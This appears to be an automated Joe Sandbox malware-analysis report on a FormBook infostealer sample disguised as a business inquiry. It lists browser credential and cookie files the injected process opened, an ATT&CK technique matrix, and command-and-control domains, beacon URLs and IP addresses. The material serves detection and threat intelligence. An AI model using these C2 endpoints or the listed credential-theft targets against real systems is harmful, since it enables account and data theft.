              Source: Yara matchFile source: 00000000.00000002.2174955869.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.CSZ inquiry for MH raw material.exe.220000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.4277646294.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278415007.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174886702.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.4278497197.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4278558823.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2174955869.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading
              312
              Process Injection
              2
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              121
              Security Software Discovery
              Remote Services1
              Email Collection
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism
              312
              Process Injection
              LSASS Memory2
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              4
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Abuse Elevation Control Mechanism
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture4
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
              Obfuscated Files or Information
              LSA Secrets2
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing
              Cached Domain Credentials12
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              CSZ inquiry for MH raw material.exe68%VirustotalBrowse
              CSZ inquiry for MH raw material.exe66%ReversingLabsWin32.Backdoor.FormBook
              CSZ inquiry for MH raw material.exe100%AviraTR/Crypt.XPACK.Gen
              CSZ inquiry for MH raw material.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.44756.pizza/a59t/0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/?88v07=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&O2=aP0Tt0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/?88v07=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&O2=aP0Tt0%Avira URL Cloudsafe
              http://cifasnc.info/8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i0%Avira URL Cloudsafe
              http://www.44756.pizza/a59t/?88v07=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&O2=aP0Tt0%Avira URL Cloudsafe
              http://www.moyu19.pro0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/?O2=aP0Tt&88v07=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0=0%Avira URL Cloudsafe
              http://www.adadev.info/ctdy/100%Avira URL Cloudmalware
              http://www.nosolofichas.online/hqr6/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=0%Avira URL Cloudsafe
              http://www.investshares.net/cf9p/0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&O2=aP0Tt0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/0%Avira URL Cloudsafe
              http://www.lonfor.website/bowc/0%Avira URL Cloudsafe
              http://www.moyu19.pro/b9e2/0%Avira URL Cloudsafe
              http://www.grimbo.boats/kxtt/?O2=aP0Tt&88v07=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg=0%Avira URL Cloudsafe
              http://www.nosolofichas.online/hqr6/?O2=aP0Tt&88v07=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=0%Avira URL Cloudsafe
              http://www.sonixingenuine.shop/01c7/0%Avira URL Cloudsafe
              https://www.sonixingenuine.shop/01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0%Avira URL Cloudsafe
              http://www.gayhxi.info/k2i2/?88v07=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&O2=aP0Tt100%Avira URL Cloudmalware
              http://www.moyu19.pro/b9e2/?88v07=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&O2=aP0Tt0%Avira URL Cloudsafe
              http://www.cifasnc.info/8rr3/0%Avira URL Cloudsafe
              http://www.denture-prices.click/dx3i/0%Avira URL Cloudsafe
              http://www.promocao.info/zaz4/?88v07=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&O2=aP0Tt0%Avira URL Cloudsafe
              http://cifasnc.info/xmlrpc.php0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              nosolofichas.online
              84.32.84.32
              truetrue
                unknown
                www.moyu19.pro
                154.39.239.237
                truetrue
                  unknown
                  dns.ladipage.com
                  18.139.62.226
                  truefalse
                    high
                    www.cifasnc.info
                    188.114.96.3
                    truefalse
                      high
                      promocao.info
                      84.32.84.32
                      truetrue
                        unknown
                        www.grimbo.boats
                        172.67.182.198
                        truefalse
                          high
                          www.lonfor.website
                          199.192.21.169
                          truefalse
                            high
                            www.denture-prices.click
                            199.59.243.228
                            truetrue
                              unknown
                              www.gayhxi.info
                              47.83.1.90
                              truefalse
                                high
                                www.investshares.net
                                154.197.162.239
                                truetrue
                                  unknown
                                  zcdn.8383dns.com
                                  134.122.135.48
                                  truefalse
                                    high
                                    www.adadev.info
                                    47.83.1.90
                                    truetrue
                                      unknown
                                      www.ebsmadrid.store
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.nosolofichas.online
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.sonixingenuine.shop
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.jrcov55qgcxp5fwa.top
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.promocao.info
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.44756.pizza
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.grimbo.boats/kxtt/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.investshares.net/cf9p/?88v07=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&O2=aP0Tttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.44756.pizza/a59t/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.denture-prices.click/dx3i/?88v07=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&O2=aP0Tttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.adadev.info/ctdy/true
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.44756.pizza/a59t/?88v07=4xL6Q7DrxWj99jxey6XhnD59kXlzpzVjNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acuv+yDBW+TCFZeEjgS2d8Hc9PwvsiMDAZ0mc=&O2=aP0Tttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.lonfor.website/bowc/?O2=aP0Tt&88v07=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0=true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.nosolofichas.online/hqr6/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sonixingenuine.shop/01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.investshares.net/cf9p/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.cifasnc.info/8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&O2=aP0Tttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.promocao.info/zaz4/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.nosolofichas.online/hqr6/?O2=aP0Tt&88v07=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.moyu19.pro/b9e2/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.lonfor.website/bowc/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.gayhxi.info/k2i2/?88v07=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&O2=aP0Tttrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.grimbo.boats/kxtt/?O2=aP0Tt&88v07=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg=true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sonixingenuine.shop/01c7/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.moyu19.pro/b9e2/?88v07=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&O2=aP0Tttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.cifasnc.info/8rr3/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.denture-prices.click/dx3i/true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.promocao.info/zaz4/?88v07=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&O2=aP0Tttrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabfc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.moyu19.progGZaaTbTIZmmI.exe, 00000006.00000002.4278386496.0000000000D32000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://cifasnc.info/8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/ifc.exe, 00000005.00000002.4279422852.0000000004E16000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.ecosia.org/newtab/fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ac.ecosia.org/autocomplete?q=fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.google.comfc.exe, 00000005.00000002.4279422852.000000000513A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000005.00000002.4281442123.0000000006380000.00000004.00000800.00020000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.000000000406A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.sonixingenuine.shop/01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUasfc.exe, 00000005.00000002.4279422852.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.00000000041FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://cifasnc.info/xmlrpc.phpfc.exe, 00000005.00000002.4279422852.0000000004E16000.00000004.10000000.00040000.00000000.sdmp, gGZaaTbTIZmmI.exe, 00000006.00000002.4278982645.0000000003D46000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000005.00000003.2371101347.0000000007E0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      154.197.162.239
                                                                      www.investshares.netSeychelles
                                                                      133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                      172.67.182.198
                                                                      www.grimbo.boatsUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      199.192.21.169
                                                                      www.lonfor.websiteUnited States
                                                                      22612NAMECHEAP-NETUSfalse
                                                                      47.83.1.90
                                                                      www.gayhxi.infoUnited States
                                                                      3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                                      18.139.62.226
                                                                      dns.ladipage.comUnited States
                                                                      16509AMAZON-02USfalse
                                                                      188.114.96.3
                                                                      www.cifasnc.infoEuropean Union
                                                                      13335CLOUDFLARENETUSfalse
                                                                      84.32.84.32
                                                                      nosolofichas.onlineLithuania
                                                                      33922NTT-LT-ASLTtrue
                                                                      199.59.243.228
                                                                      www.denture-prices.clickUnited States
                                                                      395082BODIS-NJUStrue
                                                                      154.39.239.237
                                                                      www.moyu19.proUnited States
                                                                      174COGENT-174UStrue
                                                                      134.122.135.48
                                                                      zcdn.8383dns.comUnited States
                                                                      64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1589876
                                                                      Start date and time:2025-01-13 09:37:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 57s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Run name:Potential for more IOCs and behavior
                                                                      Number of analysed new started processes analysed:7
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:CSZ inquiry for MH raw material.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/1@14/10
                                                                      EGA Information:
                                                                      • Successful, ratio: 66.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 87%
                                                                      • Number of executed functions: 14
                                                                      • Number of non-executed functions: 327
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      TimeTypeDescription
                                                                      03:39:23API Interceptor10189282x Sleep call for process: fc.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      154.197.162.239PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                      • www.investshares.net/cf9p/
                                                                      172.67.182.198gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/nuxf/
                                                                      rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/mjs1/
                                                                      inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/kxtt/
                                                                      CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                      • www.grimbo.boats/mjln/
                                                                      199.192.21.169plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                                      • www.astrafusion.xyz/pcck/
                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                      • www.bokus.site/qps0/
                                                                      ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.solidf.xyz/stho/
                                                                      DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/stiu/
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/bowc/
                                                                      rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                      • www.sesanu.xyz/rf25/
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/bowc/
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • www.lonfor.website/bowc/
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      dns.ladipage.comBLv4mI7zzY.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                      • 18.139.62.226
                                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 13.228.81.39
                                                                      www.grimbo.boatsgH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.182.198
                                                                      FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.18.171
                                                                      smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.18.171
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.18.171
                                                                      rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.182.198
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.18.171
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 104.21.18.171
                                                                      inv#12180.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.182.198
                                                                      CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.182.198
                                                                      www.moyu19.proPayment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.39.239.237
                                                                      www.cifasnc.infoKcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.97.3
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.97.3
                                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                      • 172.67.128.109
                                                                      bestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                      • 172.67.128.109
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      COMING-ASABCDEGROUPCOMPANYLIMITEDHKFG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                      • 156.226.63.13
                                                                      http://38133.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                                                      • 156.224.208.119
                                                                      http://40608.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                                                      • 156.224.208.119
                                                                      emips.elfGet hashmaliciousMiraiBrowse
                                                                      • 156.250.110.142
                                                                      PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      armv6l.elfGet hashmaliciousMiraiBrowse
                                                                      • 154.197.141.202
                                                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                      • 154.197.162.239
                                                                      CLOUDFLARENETUS1001-13.exeGet hashmaliciousFormBookBrowse
                                                                      • 188.114.96.3
                                                                      24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                      • 104.21.32.1
                                                                      https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.61.3
                                                                      g4.elfGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      msit.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.6.116
                                                                      tesr.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.90.18
                                                                      WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.134.197
